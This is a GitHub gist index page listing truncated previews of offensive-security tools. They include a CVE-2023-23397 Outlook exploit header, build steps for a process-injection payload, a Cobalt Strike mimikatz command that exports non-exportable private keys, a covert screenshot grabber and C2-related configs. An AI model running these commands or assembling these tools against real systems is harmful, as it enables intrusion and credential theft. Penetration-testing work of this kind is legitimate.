Skip to content

Instantly share code, notes, and snippets.

@tothi
tothi / bh_split2.py
Last active October 3, 2023 17:45 — forked from Acebond/bh_split2.py
Split large SharpHound datasets (JSON files) into smaller files that can more easily be imported into BloodHound. Especially useful due to the Electron memory limitations and BloodHound CE (running in browser) 1GB file size limitation.
View bh_split2.py
#!/usr/bin/python3
# Based on https://gist.github.com/deltronzero/7c23bacf97b4b61c7a2f2950ef6f35d8
# updated to current BloodHound JSON format (compatible with SharpHound 2.x and BloodHound CE)
# pip install simplejson
import simplejson
import sys
def splitfile(file_name, object_limit):
print(f"[*] Loading {file_name}")
with open(file_name) as f:
@tothi
tothi / PrtSc_Screenshotter.ps1
Created September 16, 2023 20:00
Capture screenshot by sending PrtSc key using PowerShell and grab it through HTTP with a Python CGI receiver
View PrtSc_Screenshotter.ps1
# dependency
Add-Type -AssemblyName System.Windows.Forms
# send PrtSc key (= capture the screen to the clipboard)
[Windows.Forms.Sendkeys]::SendWait("{PrtSc}")
# save the image as PNG in memory
$png = New-Object System.IO.MemoryStream
[Windows.Forms.Clipboard]::GetImage().Save($png, [System.Drawing.Imaging.ImageFormat]::Png)
@tothi
tothi / kali-fde-tpm.md
Last active June 30, 2023 15:03
Full Disk Encryption with unattended auto-unlock using TPM2; hardened with Secure Boot on Kali
View kali-fde-tpm.md

Full Disk Encryption w/ TPM2 on Kali

Short HOWTO about setting up Full Disk Encryption with unattended auto-unlock using TPM2 on Kali.

Useful for rogue devices (auto-connecting to C2), headless pentest boxes, etc. storing confidential information but lacking physical security.

NOTE: In order to maintain integrity and protect the encryption key, hardening the boot process with Secure Boot is a must. For making Secure Boot work (without messing up the default UEFI keys stored in the hardware), the Microsoft-signed UEFI shim loader is used (available in the Kali repo) which is able to load securely an arbitrary ELF image as 2nd stage

@tothi
tothi / config.nims
Last active May 13, 2023 12:21
Nim config script for making Nim build compatible with Mingw-w64 (useful on ArchLinux setups because the defaults there break things)
View config.nims
# original idea: https://github.com/nim-lang/Nim/issues/20007#issue-1300915309
# use case for https://github.com/chvancooten/NimPlant
# - put this config.nims into NimPlant/client folder and build should work without errors on ArchLinux also
import std/strutils
import std/sequtils
# remove -fstack-clash-protection
switch("gcc.options.always", replace(get("gcc.options.always"), "-fstack-clash-protection", ""))
@tothi
tothi / msmq_detect.py
Created April 17, 2023 00:09
Detect whether the remote MSMQ service on 1801/tcp is enabled or not by sending a valid message to the target
View msmq_detect.py
#!/usr/bin/env python3
#
# detect whether the remote MSMQ service on 1801/tcp is enabled or not
# by sending a valid message to the target
#
# resources:
# https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-mqmq/b7cc2590-a617-45df-b6a3-1f31102b36fb
# https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-mqqb/85498b96-f2c8-43b3-a108-c9d6269dc4af
#
@tothi
tothi / PidLidReminderPwn.py
Created March 28, 2023 09:30
Exploiting Outlook CVE-2023-23397 using Python by sending the message through EWS
View PidLidReminderPwn.py
#!/usr/bin/python -u
from exchangelib import Credentials, Configuration, Account, DELEGATE, Message, Mailbox, ExtendedProperty
from exchangelib.ewsdatetime import EWSDateTime, EWSTimeZone, UTC_NOW
from exchangelib.protocol import BaseProtocol, NoVerifyHTTPAdapter
BaseProtocol.HTTP_ADAPTER_CLS = NoVerifyHTTPAdapter
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
@tothi
tothi / openssl-legacy-md4.md
Last active September 4, 2023 12:51
/etc/ssl/openssl.cnf supporting legacy digests like MD4 (useful for offensive tools requiring NTLM support)
View openssl-legacy-md4.md

This is a minimal /etc/ssl/openssl.cnf supporting legacy algorithms on modern openssl installations where it is disabled by default.

The marked (######) lines should be added to your openssl.cnf (other parts may be unchanged).

For checking if legacy providers are enabled successfully:

$ openssl list -providers
Providers:
@tothi
tothi / DInjectQueuerAPC.cs
Last active October 2, 2023 22:35 — forked from jfmaes/DInjectQueuerAPC.cs
.NET Process injection in a new process with QueueUserAPC using D/invoke - compatible with gadgettojscript
View DInjectQueuerAPC.cs
/// Using with GadgetToJScript (e.g. for VBS payload):
/// 1.) compile to DLL: c:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /target:library /out:DInjectQueuerAPC.dll /r:System.Net.Http.dll DInjectQueuerAPC.cs
/// 2.) generate VBS: GadgetToJScript.exe -w vbs -b -o DInjectQueuerAPC -a DInjectQueuerAPC.dll
/// 3.) test: cscript.exe DInjectQueuerAPC.vbs
using System;
using System.Diagnostics;
using System.IO;
using System.Runtime.InteropServices;
using System.Threading.Tasks;
@tothi
tothi / mmimikatz.cna
Last active November 13, 2022 13:51
multi-command mimikatz functionality in a Cobalt Strike beacon
View mmimikatz.cna
#
# multi-command mimikatz in a Cobalt Strike beacon extending the built-in mimikatz functionality
#
# cmd separator is |
#
# practical example: export machine certificates (including non-exportable private key :)):
#
# mmimikatz "crypto::capi|crypto::certificates /systemstore:local_machine /store:my /export"
#
@tothi
tothi / mitmproxy-jwt-refresh-addon.py
Created August 28, 2022 20:52
mitmproxy addon for handling oauth access and refresh tokens automatically
View mitmproxy-jwt-refresh-addon.py
# run: mitmproxy -k -p 8090 -s mitmproxy-jwt-refresh-addon.py
# set burp upstream proxy to localhost:8090
#
# use case:
# - application authorization is implemented by OAuth 2.0
# - testing is performed using Burp as primary and mitmproxy as upstream proxy
# - mitmproxy takes care of the Authorization tokens using this addon
# - user gets an access_token and a refresh_token during the 1st login (e.g. password login)
# - mitmproxy addon caches access_token and refresh_token
# - mitmproxy addon adds Authorization: Bearer [access_token from cache] header for every request